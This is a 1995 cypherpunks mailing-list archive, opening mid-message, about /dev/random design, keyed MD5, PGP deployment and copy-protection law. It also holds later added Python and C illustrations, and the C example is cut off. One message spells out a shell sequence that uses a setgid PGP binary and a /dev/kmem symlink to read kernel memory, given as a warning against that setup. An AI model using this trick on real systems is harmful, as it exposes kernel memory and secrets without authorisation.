permit people to *set* the state of the pool, and assuming that the
state of the pool is not known before the write operation, writing to it
won't allow the user to know what the state is after the write
operation.

The ioctl() which sets the entropy estimate, however, *does* need to be
runnable only by the superuser, since that does represent an
attack path.

And, for race condition reasons, something which I need to implement
soon is an ioctl(), usable only by root, that simultaneously updates
the entropy estimate *and* submits data to be mixed into the pool.  (Why
this is necessary should be obvious after a few minutes thought.)

   > For example, although it
   > may not be obvious, the network interrupt may not be a good choice,
   > since an adversary who is monitoring the ethernet cable can make a
   > pretty good guess about the timing of your network interrupts, and hence
   > what the likely inputs are to the random number pool might be.

   Are you sure about this? The stochasticity of this would be pretty
   hefty. Not only would our attacker have to get the _time_ that the
   interrupt occurred (if it interrupted our machine), he would then have
   to process in brute-force mode all possible times in his error range.
   What is more, more interrupts are coming in...

I didn't say that it would be trivial for an attacker to do this, but
it's certainly *doable*.  Some of the network traffic analyzers that
have been made available (I think Sandia National Labs has one that does
this) record down to millisecond accuracy when a packet was sniffed on
the network.  

For this reason, people shouldn't really trust initializing PGP's random
number generator over a network connection, since it is possible for an
adversary to obtain very high quality timings of when your telnet or
rlogin packets appeared on the network, and hence be able to guess
(within some error range) the interkeyboard timings which PGP used
to initialize its random number generator.

The adversary might have to try a large number of possibilities, but if
the number of possibilities is less than a brute-force search, you
definitely have a weakness --- a fact which Netscape learned to its
embarrassment a few weeks ago.

   Hokay! Please also send me _your_ latest. (BTW - did Linus put it in
   his latest kernel?)

Yup.  1.1.34 and higher has most of my changes.  (I'm still making
changes which are still in development, though.  Mostly incremental
improvements of one sort or another.)

							- Ted




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Tue, 31 Oct 1995 09:14:59 +0800
To: black@sunflash.eng.usf.edu
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.SUN.3.91.951030134533.5999A-100000@sunflash.eng.usf.edu>
Message-ID: <doug-9509302237.AA0062331@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>  Since you deal with security issues maybe you can help me to learn 
>about some issues with encryption.  I am talking with one of the 
>administration people about putting PGP on the system for everyone to 
>use, but there are issues for them (the admin) as they might be liable, 
>even if they can't read the e-mail.  What other legal considerations 
>should be evaluated?
>  Are there any large organizations (like any other universities) that 
>allow their students to use PGP, and have the system in place to make it 
>easier for the students?  If it is offered here I might be the one to add 
>to the mail program (pine) that is generally used to transparently use 
>PGP, which is what I mean by having a system set up for the encryption. 
>  Thanx for any help.  Take care and have fun.
>
>James Black
>black@suntan.eng.usf.edu
>
>
We have approx 1000 machines and 5000 user accounts and have pgp installed.
I can't think of any reason not to have it installed, and lots of good
reasons for having it installed.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
	Apple T-shirt on Win95 - "Been there, done that"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 31 Oct 1995 07:47:22 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510302148.XAA00832@grumble.grondar.za>
Message-ID: <9510302225.AA25562@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 30 Oct 1995 23:48:24 +0200
   From: Mark Murray <mark@grondar.za>

   > Secondly, making /dev/random only readable by "privileged programs"
   > means that people won't be able to compile their own version of PGP that
   > can take advantage of the random number generator.  Instead, they would
   > have to use a setuid version of PGP, and I'm quite sure PGP wasn't
   > written such that it would be safe to turn on its setuid bit.  

   How about SetGID? We were going for 660 root.kmem.

Bad idea; anyone who can run PGP could then get instant access to kmem:

	cd /tmp
	ln -s /dev/kmem foo
	pgp -e tytso foo
	rm foo
	pgp foo.pgp

   > Again, /dev/random can be set to whatever permissions the system
   > administrator wants.  Secondly, writing to /dev/random merely adds
   > randomness to the pool, via the mixing algorithm.  It won't actually
   > permit people to *set* the state of the pool, and assuming that the
   > state of the pool is not known before the write operation, writing to it
   > won't allow the user to know what the state is after the write
   > operation.

   What happens if some attacker does:

   for (;;) {
	   write_to_devrandom(NULL);
	   check_to_see_if_state_is_crackable();
   }

   ? "Gut feel" suggests to me that large amounts of "predicted" input might
   be worse than the normal sort of system noise you have been using.

But keep in mind that what we're doing is XOR'ing the input data into
the pool.  (Actually, it's a bit more complicated than that.  The input
is XOR'ed in with a CRC-like function, generated by taking an
irreducible polynomial in GF(2**128).  But for the purposes of this
argument, you can think of it as XOR.)  So since you don't know what the
input state of the pool is, you won't know what the output state of the
pool is.

Also, you never get to see the actual state of the pool, even when you
read out numbers from /dev/random.  What you're getting is a *hash* of
the pool.  So if you can actually implement
check_to_see_if_state_is_crackable(), then you've found a weakness in
MD5 (or SHA, to which I'll probably be switching in the near future).

   > And, for race condition reasons, something which I need to implement
   > soon is an ioctl(), usable only by root, that simultaneously updates
   > the entropy estimate *and* submits data to be mixed into the pool.  (Why
   > this is necessary should be obvious after a few minutes thought.)

   Clue me in - I'm not quite with you? :-)

Consider this scenario:

1)  Process one writes randomness to /dev/random.

2)  Process two immediately consumes a large amount of randomness using
/dev/urandom, so that the effective randomness is now zero.

3)  Process two uses the ioctl() to bump the entropy count by the amount
of randomness added in step 1.  Unfortunately, that entropy was already
consumed in step 2.

   > I didn't say that it would be trivial for an attacker to do this, but
   > it's certainly *doable*.  Some of the network traffic analyzers that
   > have been made available (I think Sandia National Labs has one that does
   > this), records down to millisecond accuracy when a packet was sniffed on
   > the network.  

   Is this millisecond accuracy quantifiable in terms of bits of entropy?
   if so, the ethernet is surely safe?

Well, no.  If you're only using as your timing the 100Hz clock, the
adversary will have a better timebase than you do.  So you may be adding
zero or even no bits of entropy which can't be deduced by the adversary.

This is even worse in the PGP keyboard timing case, since the adversary
almost certainly can find a better time resolution to measure your
incoming packets when compared to the timing resolution that most
programs have.  Far too many Unix systems only make a 100Hz clock
available to the user mode, even if you have a better quality high
resolution timing device in the kernel (for example, the Pentium cycle
counting register).

   Again, if you can quantify the number of possibilities into bits of entropy,
   your code is good. Depending on current technology, this may have to change.

The problem is that doing this requires making assumptions
about what the capabilities of your adversary are.  Not only does this
change over time, but certain adversaries (like the NSA) make it their
business to conceal their capabilities, for precisely this reason.

So I like to be conservative and use limits which are imposed by the
laws of physics, as opposed to the current level of technology.  Hence,
if the packet arrival time can be observed by an outsider, you are at
real risk in using the network interrupts as a source of entropy.
Perhaps it requires building a very complicated model of how your Unix
scheduler works, and how much time it takes to process network packets,
etc.  ---- but I have to assume that an adversary can very precisely
model that, if they were to work hard enough at it.

People may disagree as to whether or not this is possible, but it's not
prevented by the laws of physics; merely by how much effort someone
might need to put in to be able to model a particular operating system's
networking code.  In any case, that's why I don't like depending on
network interrupts.  Your paranoia level may vary.

						- Ted
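
The three-step scenario in the message above, worked through as an added example (not code from the post or from the Linux or FreeBSD driver): a toy Python model of the pool's bookkeeping. PoolModel, its method names, the 64-byte pool and the simulation-only fresh_bits counter are assumptions made for the illustration.

```python
import hashlib

POOL_BYTES = 64            # assumed pool size for this model
POOL_BITS = POOL_BYTES * 8
SEED = bytes(range(16))    # constructed sample standing in for 128 random bits


class PoolModel:
    """Toy model of the bookkeeping in the message; not driver code."""

    def __init__(self):
        self.pool = bytearray(POOL_BYTES)
        self.pos = 0
        self.reads = 0
        self.estimate_bits = 0  # the driver's entropy estimate
        self.fresh_bits = 0     # simulation-only truth: mixed-in bits not yet consumed

    def _mix(self, data):
        # The message says to think of the mixing step as XOR into the pool.
        for byte in data:
            self.pool[self.pos] ^= byte
            self.pos = (self.pos + 1) % POOL_BYTES

    def write(self, data, true_bits):
        """write() to the device: mixes data in, leaves the estimate alone."""
        self._mix(data)
        self.fresh_bits = min(POOL_BITS, self.fresh_bits + true_bits)

    def credit(self, bits):
        """Root-only ioctl that only raises the estimate."""
        self.estimate_bits = min(POOL_BITS, self.estimate_bits + bits)

    def add_entropy(self, data, bits):
        """Combined root-only operation: mix and credit as one step."""
        self._mix(data)
        self.fresh_bits = min(POOL_BITS, self.fresh_bits + bits)
        self.estimate_bits = min(POOL_BITS, self.estimate_bits + bits)

    def read_urandom(self, nbytes):
        """Never refuses; the output is a hash of the pool, not the pool."""
        out = b""
        while len(out) < nbytes:
            self.reads += 1
            counter = self.reads.to_bytes(8, "little")
            out += hashlib.md5(bytes(self.pool) + counter).digest()
        self.estimate_bits = max(0, self.estimate_bits - 8 * nbytes)
        self.fresh_bits = max(0, self.fresh_bits - 8 * nbytes)
        return out[:nbytes]

    def read_random(self, nbytes):
        """Hands out no more bytes than the estimate covers (short read)."""
        return self.read_urandom(min(nbytes, self.estimate_bits // 8))

    def snapshot(self):
        return {"estimate": self.estimate_bits, "fresh": self.fresh_bits}


def separate_write_then_credit():
    """Steps 1-3 of the message: write, competing drain, late credit."""
    p = PoolModel()
    p.write(SEED, 128)      # step 1: data is mixed in, not yet credited
    p.read_urandom(64)      # step 2: another process drains 512 bits
    p.credit(128)           # step 3: the credit arrives after the drain
    state = p.snapshot()
    state["granted"] = len(p.read_random(16))
    return state


def combined_add_entropy(drain_first):
    """Same actors, but the drain cannot land between mix and credit."""
    p = PoolModel()
    if drain_first:
        p.read_urandom(64)
    p.add_entropy(SEED, 128)
    if not drain_first:
        p.read_urandom(64)
    state = p.snapshot()
    state["granted"] = len(p.read_random(16))
    return state


if __name__ == "__main__":
    print("separate write + credit:", separate_write_then_credit())
    print("combined, drain after  :", combined_add_entropy(False))
    print("combined, drain before :", combined_add_entropy(True))
```

With the separate calls the estimate ends at 128 bits while nothing unconsumed backs it, so the blocking device hands out 16 bytes it should have withheld; with the combined call the estimate and the ground truth agree in either ordering.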




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 31 Oct 1995 10:17:33 +0800
To: cypherpunks@toad.com
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <doug-9509302237.AA0062331@netman.eng.auburn.edu>
Message-ID: <Pine.ULT.3.91.951030172150.26310H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995, Doug Hughes wrote:

> >  Since you deal with security issues maybe you can help me to learn 
> >about some issues with encryption.  I am talking with one of the 
> >administration people about putting PGP on the system for everyone to 
> >use, but there are issues for them (the admin) as they might be liable, 
> >even if they can't read the e-mail.  What other legal considerations 
> >should be evaluated?
> >  Are there any large organizations (like any other universities) that 
> >allow their students to use PGP, and have the system in place to make it 
> >easier for the students?  If it is offered here I might be the one to add 
> >to the mail program (pine) that is generally used to transparently use 
> >PGP, which is what I mean by having a system set up for the encryption. 
> >
> We have approx 1000 machines and 5000 user accounts and have pgp installed.
> I can't think of any reason not to have it installed, and lots of good
> reasons for having it installed.

"Me too," except the numbers are higher.

I would think that you would worry more about your users getting a false
sense of security from storing secret keys on a large multiuser system
than about being held liable for naughty PGP-encrypted traffic. I don't 
see how you could be held liable anyway. How is PGP that much different 
from allowing your users to set a password on their account? It makes it 
harder for root to invade their privacy, but in general, we have very 
stringent requirements that must be satisfied before we'll read user 
directories or mail.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 31 Oct 1995 10:21:14 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510302351.AA28243@zorch.w3.org>
Message-ID: <Pine.SOL.3.91.951030172638.429C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995 hallam@w3.org wrote:

> 	Do not spec Keyed MD5, it is a complete loser. It is actually weak
> against a number of attacks. There are much better constructs for creating

What I've heard is that there are some worries about using short 
constants with MD5; maybe you could fill us in on the naughty stuff 
(someone said there were a load of papers in Crypto '95 on the subject?)

> 
> 	There is some work by Phil Rogaway on making keyed digest functions
> which I strongly recommend people look at. I can post a paper on the subject if 
> people are interested.

Hey, you got a web-site? :-)

Simon

----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 31 Oct 1995 10:24:00 +0800
To: cypherpunks@toad.com
Subject: Keyed-MD5, and HTTP-NG
Message-ID: <9509308151.AA815103202@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon,
        There are a few different ways to add key material to MD5 to
make it suitable as a shared-secret authenticator function.  Some of these
are less resistant to attacks than others.  For example, the keyed MD5
mechanism that is part of the current IPsec specifications can be
attacked using 2**60 chosen messages.  Fortunately, the IPsec specs
also require that the shared MD5 key be changed every 2**32 messages,
so this attack is unlikely to succeed.  Specifically, IPsec uses
MD5 as follows:  X = MD5(key | keypad | Message), where "|" means
concatenation and the "keypad" pads out the key to 512 bits.
Basically, this function is the same as standard MD5 with a
different initialization vector for the compression operation
on the first block of the message.
        RSA Labs recommends that people use an authenticator like
X = MD5(key1, MD5(key2, Message)).  This resists the chosen plaintext
attacks that were published at the crypto conference in Spring 1995.
        There are also some very fast MAC algorithms being proposed
these days.  As Phill Hallam mentioned, you may want to look at the
work of Phil Rogaway.  At a minimum, make sure that your standard
allows people to migrate from a current solution based on MD5 to a
future solution based on new functions.  However, I would be reluctant
to require new functions until they have had a chance to be tested
by the cryptographic research community.
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Tue, 31 Oct 1995 10:45:15 +0800
To: "'cypherpunks@toad.com>
Subject: Article on PGP (Noise)
Message-ID: <01BAA6F2.B9A98120@king1-20.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        C'punks
        I saw a good article on PGP in this month's issue of American
Survival Guide. Not only did the article portray the use of strong crypto as a
good thing for privacy and liberty, it also tells the reader where to
obtain PGP. After that, the article goes into some of the issues surrounding
PGP such as ITAR, Phil Zimmermann's legal troubles (It even tells how to
contribute to his legal fund.) and how the government is really against it.
        After the background, the article gives clear, detailed, step by step
instructions on how to use it; from the initial unzipping of the program to
setup and key generation and management.
        All in all, I found this a very informative article for the new user
and even some of the more advanced users (Hey-you learn something new every
day, right?).
        It wasn't the type of article that wouldn't be covered in Time
or Newsweak that's for sure.

Eric

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMJWDeyQV+sMsxjC5AQGT9QH9E8BHovGCmu7p9wB2nYQzmebqFPw3sfnR
2CuFTSvkdbg/4yArOsE87S+g28I2B/tscaVYdAO8HA5CdhVVAxbH0w==
=wjpi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 31 Oct 1995 03:14:14 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <Pine.3.89.9510301809.A11286-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Oct 1995, Bill Stewart wrote:

> More of a problem with this system is that it's only useful for terminal
> remailers; to use it in the middle of a chain, the next remailer would
> need to be configured to auto-accept such messages, or else your remailer
> would need to have a list of known remailers and use direct delivery
> for all mail sent to them.

That's not a problem with Mixmaster, as it already knows whether the 
message is the last hop of a chain or not. I was hoping to get my hack 
finished this weekend, but got caught up in CTCP instead (which I'll 
release once I find out why it kills my xterm on exit 8-()..

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 31 Oct 1995 02:42:16 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510301816.UAA14080@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>    > > On this same track, I suggest that "/dev/random" devices for unix are
>    > > an excellent idea. Ted Tso did one for Linux that steals all the bits
>    > > of semi-random timing information it can.
>    >
>    > Anyone know where I can find more information on this wonderful device?
> 
> I've just sent patches (versus the Linux 1.3.28 kernel) off to Linus.
> There's a fairly long exposition at the beginning of
> drivers/char/random.c which explain its theory of operation.

A colleague drew my attention to this, and I was so pleased with it that
I ported it to FreeBSD.

I kept the interface as close to the original as I could, but made some
changes for efficiency and ease:

1) I turned the huge comment at the top explaining the theory of operation
into a man page (random(4)).

2) We felt that hooking all interrupts might be dangerous. IDE drives can
interrupt at a heck of a rate, and so can some serial ports, and we felt
that in these cases _not_ using the interrupt was a good idea. So I
added an ioctl to allow the superuser to select his own set, appropriate
to the hardware in use. It is nearly impossible to do this automatically.

Gimme a yell if you want copies :-)

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Tue, 31 Oct 1995 10:30:26 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.ULT.3.91.951030172150.26310H-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951030203059.17469B-100000@yes>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 30 Oct 1995, Rich Graves wrote:

> On Mon, 30 Oct 1995, Doug Hughes wrote:
> 
> I would think that you would worry more about your users getting a false
> sense of security from storing secret keys on a large multiuser system
> than about being held liable for naughty PGP-encrypted traffic. I don't 
> see how you could be held liable anyway. How is PGP that much different 
> from allowing your users to set a password on their account? It makes it 
> harder for root to invade their privacy, but in general, we have very 
> stringent requirements that must be satisfied before we'll read user 
> directories or mail.

  As a student I am concerned with the false security, and that was 
mentioned while we were talking (today).  As to liability, it is 
important that no one can come back and hold the school liable.  Once the 
messages can be encrypted then it is harder to read the messages, but not 
impossible, unless the students keep the key on a disk, and just ftp it 
into the account every time.  The fact is that that won't be the rule, so 
the admin can still read messages, but there will need to be clear-cut 
reasons for them to do that (IMOHO).  I am curious what requirements must 
be met.  I guess there are more schools that allow this than I expected 
<g>.  Well thanx for replying.  Take care and have fun.

James Black
black@suntan.eng.usf.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Tue, 31 Oct 1995 10:33:09 +0800
To: cypherpunks@toad.com
Subject: Re: S. 1284 To Amend (C) Act
Message-ID: <Pine.BSD/.3.91.951030203647.3975A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


>>  S. 1284,  s1201:  "No person shall import, manufacture or distribute
>>  any device, product, or component incorporated into a device or
>>  product, or offer or perform any service, the primary purpose or
						  ^^^^^^^^^^^^^^^

>IANAL, but I thought these types of laws were already tested and deemed  
>unconstitutional in cases involving video-tape copying boxes, dual video
>cassette dubbing decks, SCMS 'scrubbers', etc...

I think the large gray area here is the phrase primary purpose.  The 
primary purpose of a device is in the user's mind only.  Videotape copying 
of noncopyright materials is done on a vast scale now due to home 
camcorders.  But even if only a few people had camcorders they should be 
able to purchase equipment that can be used legally.

Introducing the concept of "primary purpose" makes law abiding citizens 
suffer because some people are breaking the law.  If an item has any 
legal purpose it must be allowed.

This trend to take technology that *can* be used to commit crimes out of
the hands of citizen units is growing.  We see it with crypto export
controls and recently with the PA law and Federal law making it a crime to
possess devices and software to reprogram cell phones. 

When this doesn't make a dent in the number of these crimes I predict we 
will see licensing of technologies such as eeprom programmers, spectrum 
analyzers, frequency counters, and yes of course strong crypto.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 31 Oct 1995 12:59:02 +0800
To: cypherpunks@toad.com
Subject: Copy Protection Schemes
Message-ID: <acbae24801021004348b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 PM 10/30/95, Andrew Loewenstern wrote:

>IANAL, but I thought these types of laws were already tested and deemed
>unconstitutional in cases involving video-tape copying boxes, dual video
>cassette dubbing decks, SCMS 'scrubbers', etc...

The copy-defeat and SCMS scrubbers exist in a legal limbo, mainly being
sold for "other purposes" and often by companies which come and go in the
back pages of audio and video magazines.

For example, I've used an audio gadget (Audio Alchemy "DTI") that reclocks
the bit stream out of a digital source (CD or DAT player)...one of the side
effects is that it also strips (or resets, to be more precise) the SCMS
bits on a DAT recording. Effectively, it defeats the SCMS (Serial Copy
Management System) copy protection scheme. The company that makes it is of
course well aware of this side effect, as is the audiophile/DAT community,
but the company (Audio Alchemy) takes great pains _not_ to mention this
side effect in their literature.

Likewise, the various Macrovision video copy protection scheme defeaters,
such as may be found in the back pages of video magazines, are "for the
legitimate user only."

I'm fairly certain that any open and aboveboard advertising of such
products as "copy protection defeaters" would face legal challenges under
the copyright laws.

The Go Video and other dual-cassette systems have ostensible legitimate
uses (notably, copying of tapes one has made, perhaps of lectures or
speeches or other personal recordings) and have been "allowed." In
particular, Go Video was held up in its plans for a couple of years while
lawyers and regulators negotiated.

Other cases, such as the Sony-Disney Betamax case, and, indeed, the Xerox
machine itself, involve other issues. Practicalities of enforcement are one
of the most important issues. The Supreme Court obviously looked at the
noninfringing uses (home movies, for example), the difficulty of enforcing
laws against the taping of television shows and movies, etc., and concluded
that technology and markets had made that particular aspect of copyright
law moot. The rationale of "time-shifting" was just the best face they
could put on it, in my view.

Anyway, there are lots of issues and lots of nuances.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 31 Oct 1995 05:12:39 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510301925.VAA27116@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>    Date: Mon, 30 Oct 1995 20:16:24 +0200
>    From: Mark Murray <mark@grondar.za>
> 
>    A colleague drew my attention to this, and I was so pleased with it that
>    I ported it to FreeBSD.
> 
> Which version did you grab?  More recent versions of the driver use a
> more efficient mixing algorithm suggested by Colin Plumb.  There's also
> the beginnings of support for user-mode daemons to add randomness into
> the random pool by writing to /dev/random.  I also added support for
> reading the instruction timing register for x86 platforms that support
> it. 

Version 0.92 21st Sept 1995.

Something I didn't mention earlier; we felt that letting the unwashed
masses read /dev/*random was not a good idea, as they could deplete
the pool of entropy all too easily for attack purposes. For the same
(or similar) reason, giving the said unwashed masses _write_ privilege
might allow them to set /dev/*random to a known state. You've probably
already thought of this, but I just had to say it :-).

>    2) We felt that hooking all interrupts might be dangerous. IDE drives can
>    interrupt at a heck of a rate, and so can some serial ports, and we felt
>    that in these cases _not_ using the interrupt was a good idea. So I
>    added an ioctl to allow the superuser to select his own set, appropriate
>    to the hardware in use. It is nearly impossible to do this automatically.
> 
> Indeed; I can't emphasize this enough.  The clock interrupt, for
> example, is a very bad irq to try to use.  In the Linux driver, only
> device drivers who register their interrupt driver with the
> SA_SAMPLE_RANDOM flag actually have the interrupt timings sampled for
> the random number generator.

(Hmm.. Thinks of ways of doing something similar. I'm not functioning too
well right now.)

> People have suggested making it possible to select at run-time
> which interrupts to sample, instead of compiling it into the device
> drivers.  I've generally not been convinced this is a good idea, because
> most system administrators won't likely know which irq's are good and
> which are bad for random number generation.  For example, although it
> may not be obvious, the network interrupt may not be a good choice,
> since an adversary who is monitoring the ethernet cable can make a
> pretty good guess about the timing of your network interrupts, and hence
> what the likely inputs are to the random number pool might be.

Are you sure about this? The stochasticity of this would be pretty
hefty. Not only would our attacker have to get the _time_ that the
interrupt occurred (if it interrupted our machine), he would then have
to process in brute-force mode all possible times in his error range.
What is more, more interrupts are coming in...

>    Gimme a yell if you want copies :-)
> 
> Sure, why not.   I'd be interested to see what you did.

Hokay! Please also send me _your_ latest. (BTW - did Linus put it in
his latest kernel?)

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Tue, 31 Oct 1995 11:36:57 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510302148.XAA00832@grumble.grondar.za>
Message-ID: <VAA13893.199510310259@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199510302148.XAA00832@grumble.grondar.za>, Mark Murray writes:
[...]
>> I don't agree that restricting read access is useful.  First of all, if
>> the pool of entropy is depleted, someone who tries to obtain entropy by
>> reading /dev/random will know that they didn't get enough entropy.  So
>> assuming a program that actually checks return values from system calls,
>> this is at worst a denial of service attack, and there are much easier
>> ways of performing those sorts of attacks: "while (1) fork()", for
>> example.
>
>Hmm. Lemme think about this...

When /dev/random doesn't have "enough" entropy left does reading
from it return an error, or block?  I would strongly suggest
blocking, as the non-blocking behavior is not really all that useful.

Either can simulate the other, but I think it comes down to:

non-blocking worst-case:
 a program calls /dev/random, doesn't get randomness, ignores
 error code, poorly protects some valuable thing, as a result
 the valuable thing gets stolen.

blocking worst-case:
 a program calls /dev/random, waits a long time to get random numbers,
 user curses the slow machine/program, valuable thing gets sent late,
 but is not stolen.

non-blocking best-case failure:
 a program calls /dev/random, doesn't get randomness, informs smart
 user, who finds the bad guy sucking all bits from /dev/random,
 has them ejected from system.

blocking best-case failure:
 same as worst-case (i.e. the worst-case is lots better, the best-case
 is worse).  This can be transformed to the non-blocking best-case 
 failure by clever programming (threads, or fork, or sigalarm), the
 people who do this are far more likely to actually try to issue a
 good error message than the people who get non-blocking by default.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 31 Oct 1995 14:41:38 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb5766d09021004a512@[205.199.118.202]>
Message-ID: <3095BF32.2A72@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 4:43 PM 10/26/95, Jeff Weinstein wrote:
> 
> >  The ITARs are currently keeping us(Netscape) from distributing
> >our US-only products to people within the United States.  We have
> >asked for clarification from the government about network distribution,
> >such as how much verification of location and citizenship of the
> >recipient we must do, and have yet to receive a response.  That
> >makes it more than just an export issue, at least for us.
> 
> And I agree that this is a much more important issue than whether a t-shirt
> can get an OK for export or not.
> 
> If the CJR for the t-shirt is ultimately granted, what useful information
> will be derived, or what implications for Netscape's question will be
> discovered?
> 
> If the CJR for the t-shirt is ultimately denied, ditto?

  It will force the bureaucrats to make a decision, which will be
the subject of much public scrutiny.  Hopefully it will generate a
stir in the press and inform many more people of the problems of
the current system.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 31 Oct 1995 11:52:56 +0800
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <VAA13893.199510310259@garotte.va.pubnix.com>
Message-ID: <9510310316.AA26268@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 30 Oct 1995 21:59:14 -0500
   From: "Josh M. Osborne" <stripes@va.pubnix.com>

   When /dev/random doesn't have "enough" entropy left does reading
   from it return an error, or block?  I would strongly suggest
   blocking, as the non-blocking behavior is not really all that useful.

It acts like many character devices and named pipes in that if there is
no entropy available at all, it blocks.  If there is some entropy
available, but not enough, it returns what is available.  (A subsequent
read will then block, since no entropy will then be available.)

Actually, what's currently in Linux doesn't work precisely like this,
but it will soon.  After talking to a number of people on both sides of the
block vs. non-blocking camp, this seemed to be a suitable compromise.
At least one Major Workstation Vendor is planning on using this behavior
for their /dev/random, to appear in a future OS release.  If we all can
standardize on this behavior, it'll make application writers' jobs that
much easier.

						- Ted
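
The read semantics Ted describes (block when the pool is empty, return a short count when it is only partly full) together with the timeout wrapper Josh mentions (blocking turned into a failure the program can report), as an added C example that is not code from the thread or from either driver. The function names, result codes and the 5-second limit are this example's own assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* Outcome codes; the names are this example's own. */
enum { RF_OK = 0, RF_TIMEOUT = -1, RF_EOF = -2, RF_ERROR = -3 };

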